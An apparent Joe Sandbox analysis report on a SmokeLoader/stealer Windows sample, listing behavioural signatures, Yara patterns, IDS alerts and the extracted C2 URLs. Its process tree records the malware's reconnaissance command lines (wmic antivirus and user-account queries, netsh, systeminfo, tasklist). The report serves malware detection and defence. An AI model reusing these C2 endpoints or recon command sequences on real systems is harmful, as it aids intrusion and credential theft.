Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OCYe9qcxiM.exe

Overview

General Information

Sample name:OCYe9qcxiM.exe
renamed because original name is a hash value
Original sample name:2a6994149baff1e680719f89062bfcc7.exe
Analysis ID:1522699
MD5:2a6994149baff1e680719f89062bfcc7
SHA1:62abd53b0db022f2d20cb7ba5e1f2373753ecba1
SHA256:ce434bc783d75cceafbddd59dd3ed43d4bf1811e0344ba5fdc6958af146254e7
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • OCYe9qcxiM.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\OCYe9qcxiM.exe" MD5: 2A6994149BAFF1E680719F89062BFCC7)
    • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 4470.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\Temp\4470.exe MD5: D07C1E0124B1CFA23AA3699216AA912F)
      • 354F.exe (PID: 8108 cmdline: C:\Users\user\AppData\Local\Temp\354F.exe MD5: 815279E7D757D334D6E9EF9B249CA705)
        • cmd.exe (PID: 1308 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 4040 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7472 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2300 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3700 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3120 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6680 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4584 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4932 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3364 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1056 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5496 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4608 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3756 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6080 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 7412 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 5672 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 5680 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 7580 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 7864 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5268 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7144 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7252 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • hehcrfb (PID: 7748 cmdline: C:\Users\user\AppData\Roaming\hehcrfb MD5: 2A6994149BAFF1E680719F89062BFCC7)
  • fihcrfb (PID: 8068 cmdline: C:\Users\user\AppData\Roaming\fihcrfb MD5: D07C1E0124B1CFA23AA3699216AA912F)
  • msiexec.exe (PID: 3500 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • hehcrfb (PID: 4448 cmdline: C:\Users\user\AppData\Roaming\hehcrfb MD5: 2A6994149BAFF1E680719F89062BFCC7)
  • fihcrfb (PID: 6848 cmdline: C:\Users\user\AppData\Roaming\fihcrfb MD5: D07C1E0124B1CFA23AA3699216AA912F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 25 entries
        SourceRuleDescriptionAuthorStrings
        7.2.4470.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.2.4470.exe.2160e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            8.3.fihcrfb.6d0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              8.2.fihcrfb.6c0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                7.3.4470.exe.2170000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 1 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hehcrfb, CommandLine: C:\Users\user\AppData\Roaming\hehcrfb, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hehcrfb, NewProcessName: C:\Users\user\AppData\Roaming\hehcrfb, OriginalFileName: C:\Users\user\AppData\Roaming\hehcrfb, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\hehcrfb, ProcessId: 7748, ProcessName: hehcrfb
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 5496, ProcessName: WMIC.exe
                  Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1308, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 5672, ProcessName: ROUTE.EXE
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:37:52.397966+020020391031A Network Trojan was detected192.168.2.849706187.228.112.17580TCP
                  2024-09-30T15:37:53.550741+020020391031A Network Trojan was detected192.168.2.849707187.228.112.17580TCP
                  2024-09-30T15:37:54.522033+020020391031A Network Trojan was detected192.168.2.849708187.228.112.17580TCP
                  2024-09-30T15:37:55.560773+020020391031A Network Trojan was detected192.168.2.849709187.228.112.17580TCP
                  2024-09-30T15:37:56.721574+020020391031A Network Trojan was detected192.168.2.849710187.228.112.17580TCP
                  2024-09-30T15:37:57.725587+020020391031A Network Trojan was detected192.168.2.849711187.228.112.17580TCP
                  2024-09-30T15:37:58.851638+020020391031A Network Trojan was detected192.168.2.849712187.228.112.17580TCP
                  2024-09-30T15:37:59.878104+020020391031A Network Trojan was detected192.168.2.849713187.228.112.17580TCP
                  2024-09-30T15:38:00.864999+020020391031A Network Trojan was detected192.168.2.849714187.228.112.17580TCP
                  2024-09-30T15:38:01.850458+020020391031A Network Trojan was detected192.168.2.849715187.228.112.17580TCP
                  2024-09-30T15:38:03.027320+020020391031A Network Trojan was detected192.168.2.849716187.228.112.17580TCP
                  2024-09-30T15:38:03.993808+020020391031A Network Trojan was detected192.168.2.849717187.228.112.17580TCP
                  2024-09-30T15:38:04.972429+020020391031A Network Trojan was detected192.168.2.849718187.228.112.17580TCP
                  2024-09-30T15:38:05.963208+020020391031A Network Trojan was detected192.168.2.849719187.228.112.17580TCP
                  2024-09-30T15:38:06.991497+020020391031A Network Trojan was detected192.168.2.849720187.228.112.17580TCP
                  2024-09-30T15:38:07.970450+020020391031A Network Trojan was detected192.168.2.849721187.228.112.17580TCP
                  2024-09-30T15:38:08.937819+020020391031A Network Trojan was detected192.168.2.849722187.228.112.17580TCP
                  2024-09-30T15:38:09.905426+020020391031A Network Trojan was detected192.168.2.849723187.228.112.17580TCP
                  2024-09-30T15:38:10.885092+020020391031A Network Trojan was detected192.168.2.849724187.228.112.17580TCP
                  2024-09-30T15:38:11.851843+020020391031A Network Trojan was detected192.168.2.849725187.228.112.17580TCP
                  2024-09-30T15:38:17.653595+020020391031A Network Trojan was detected192.168.2.849728187.228.112.17580TCP
                  2024-09-30T15:38:18.643607+020020391031A Network Trojan was detected192.168.2.849729187.228.112.17580TCP
                  2024-09-30T15:38:19.631633+020020391031A Network Trojan was detected192.168.2.849730187.228.112.17580TCP
                  2024-09-30T15:38:21.247631+020020391031A Network Trojan was detected192.168.2.849731187.228.112.17580TCP
                  2024-09-30T15:38:22.219164+020020391031A Network Trojan was detected192.168.2.849732187.228.112.17580TCP
                  2024-09-30T15:38:23.194439+020020391031A Network Trojan was detected192.168.2.849733187.228.112.17580TCP
                  2024-09-30T15:38:24.808335+020020391031A Network Trojan was detected192.168.2.849734187.228.112.17580TCP
                  2024-09-30T15:38:26.006013+020020391031A Network Trojan was detected192.168.2.849735187.228.112.17580TCP
                  2024-09-30T15:38:26.988643+020020391031A Network Trojan was detected192.168.2.849736187.228.112.17580TCP
                  2024-09-30T15:38:27.988458+020020391031A Network Trojan was detected192.168.2.849737187.228.112.17580TCP
                  2024-09-30T15:38:44.499108+020020391031A Network Trojan was detected192.168.2.84973823.145.40.162443TCP
                  2024-09-30T15:38:45.886177+020020391031A Network Trojan was detected192.168.2.84973923.145.40.162443TCP
                  2024-09-30T15:38:46.894888+020020391031A Network Trojan was detected192.168.2.84974023.145.40.162443TCP
                  2024-09-30T15:38:47.794779+020020391031A Network Trojan was detected192.168.2.84974123.145.40.162443TCP
                  2024-09-30T15:38:48.830258+020020391031A Network Trojan was detected192.168.2.84974223.145.40.162443TCP
                  2024-09-30T15:38:50.503370+020020391031A Network Trojan was detected192.168.2.84974323.145.40.162443TCP
                  2024-09-30T15:38:52.011851+020020391031A Network Trojan was detected192.168.2.84974423.145.40.162443TCP
                  2024-09-30T15:38:52.984161+020020391031A Network Trojan was detected192.168.2.84974523.145.40.162443TCP
                  2024-09-30T15:38:53.912532+020020391031A Network Trojan was detected192.168.2.84974623.145.40.162443TCP
                  2024-09-30T15:38:54.938562+020020391031A Network Trojan was detected192.168.2.84974723.145.40.162443TCP
                  2024-09-30T15:38:56.246553+020020391031A Network Trojan was detected192.168.2.84974823.145.40.162443TCP
                  2024-09-30T15:38:57.222508+020020391031A Network Trojan was detected192.168.2.84974923.145.40.162443TCP
                  2024-09-30T15:39:03.093048+020020391031A Network Trojan was detected192.168.2.84975023.145.40.162443TCP
                  2024-09-30T15:39:34.947698+020020391031A Network Trojan was detected192.168.2.849751187.228.112.17580TCP
                  2024-09-30T15:39:36.916354+020020391031A Network Trojan was detected192.168.2.849752187.228.112.17580TCP
                  2024-09-30T15:39:40.479139+020020391031A Network Trojan was detected192.168.2.849753187.228.112.17580TCP
                  2024-09-30T15:39:47.650001+020020391031A Network Trojan was detected192.168.2.849754187.228.112.17580TCP
                  2024-09-30T15:39:57.130255+020020391031A Network Trojan was detected192.168.2.849755187.228.112.17580TCP
                  2024-09-30T15:40:09.910486+020020391031A Network Trojan was detected192.168.2.849756187.228.112.17580TCP
                  2024-09-30T15:40:17.577744+020020391031A Network Trojan was detected192.168.2.84975723.145.40.162443TCP
                  2024-09-30T15:40:24.269864+020020391031A Network Trojan was detected192.168.2.849758109.121.204.1480TCP
                  2024-09-30T15:40:37.644731+020020391031A Network Trojan was detected192.168.2.84975923.145.40.162443TCP
                  2024-09-30T15:40:46.200997+020020391031A Network Trojan was detected192.168.2.849760109.121.204.1480TCP
                  2024-09-30T15:40:59.327335+020020391031A Network Trojan was detected192.168.2.84976123.145.40.162443TCP
                  2024-09-30T15:41:09.207582+020020391031A Network Trojan was detected192.168.2.849762109.121.204.1480TCP
                  2024-09-30T15:41:22.625430+020020391031A Network Trojan was detected192.168.2.84976323.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:38:44.836500+020028098821Malware Command and Control Activity Detected192.168.2.84973823.145.40.162443TCP
                  2024-09-30T15:38:46.251562+020028098821Malware Command and Control Activity Detected192.168.2.84973923.145.40.162443TCP
                  2024-09-30T15:38:47.176802+020028098821Malware Command and Control Activity Detected192.168.2.84974023.145.40.162443TCP
                  2024-09-30T15:38:48.079552+020028098821Malware Command and Control Activity Detected192.168.2.84974123.145.40.162443TCP
                  2024-09-30T15:38:49.104360+020028098821Malware Command and Control Activity Detected192.168.2.84974223.145.40.162443TCP
                  2024-09-30T15:38:51.323680+020028098821Malware Command and Control Activity Detected192.168.2.84974323.145.40.162443TCP
                  2024-09-30T15:38:52.294530+020028098821Malware Command and Control Activity Detected192.168.2.84974423.145.40.162443TCP
                  2024-09-30T15:38:53.297588+020028098821Malware Command and Control Activity Detected192.168.2.84974523.145.40.162443TCP
                  2024-09-30T15:38:54.205270+020028098821Malware Command and Control Activity Detected192.168.2.84974623.145.40.162443TCP
                  2024-09-30T15:38:55.243276+020028098821Malware Command and Control Activity Detected192.168.2.84974723.145.40.162443TCP
                  2024-09-30T15:38:56.520099+020028098821Malware Command and Control Activity Detected192.168.2.84974823.145.40.162443TCP
                  2024-09-30T15:38:57.565466+020028098821Malware Command and Control Activity Detected192.168.2.84974923.145.40.162443TCP
                  2024-09-30T15:39:03.458246+020028098821Malware Command and Control Activity Detected192.168.2.84975023.145.40.162443TCP
                  2024-09-30T15:40:17.914963+020028098821Malware Command and Control Activity Detected192.168.2.84975723.145.40.162443TCP
                  2024-09-30T15:40:38.006496+020028098821Malware Command and Control Activity Detected192.168.2.84975923.145.40.162443TCP
                  2024-09-30T15:40:59.669661+020028098821Malware Command and Control Activity Detected192.168.2.84976123.145.40.162443TCP
                  2024-09-30T15:41:22.977909+020028098821Malware Command and Control Activity Detected192.168.2.84976323.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:38:44.970431+020028298482Potentially Bad Traffic23.145.40.162443192.168.2.849738TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                  Source: C:\Users\user\AppData\Roaming\hehcrfbReversingLabs: Detection: 36%
                  Source: OCYe9qcxiM.exeReversingLabs: Detection: 36%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\fihcrfbJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\hehcrfbJoe Sandbox ML: detected
                  Source: OCYe9qcxiM.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B636F0 CryptExportKey,CryptExportKey,9_2_00007FF780B636F0
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF780B63220
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C33098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,11_2_00C33098
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C33717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,11_2_00C33717
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C33E04 RtlCompareMemory,CryptUnprotectData,11_2_00C33E04
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,11_2_00C311E1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C31198 CryptBinaryToStringA,CryptBinaryToStringA,11_2_00C31198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C3123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,11_2_00C3123B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C31FCE CryptUnprotectData,RtlMoveMemory,11_2_00C31FCE
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,14_2_00C22404
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,14_2_00C2245E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,14_2_00C2263E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD25A4 CryptBinaryToStringA,CryptBinaryToStringA,16_2_00AD25A4
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_00AD2799
                  Source: OCYe9qcxiM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF780B6FB34
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,11_2_00C32B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,11_2_00C31D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,11_2_00C33ED9
                  Source: C:\Windows\explorer.exeCode function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,13_2_00D330A8
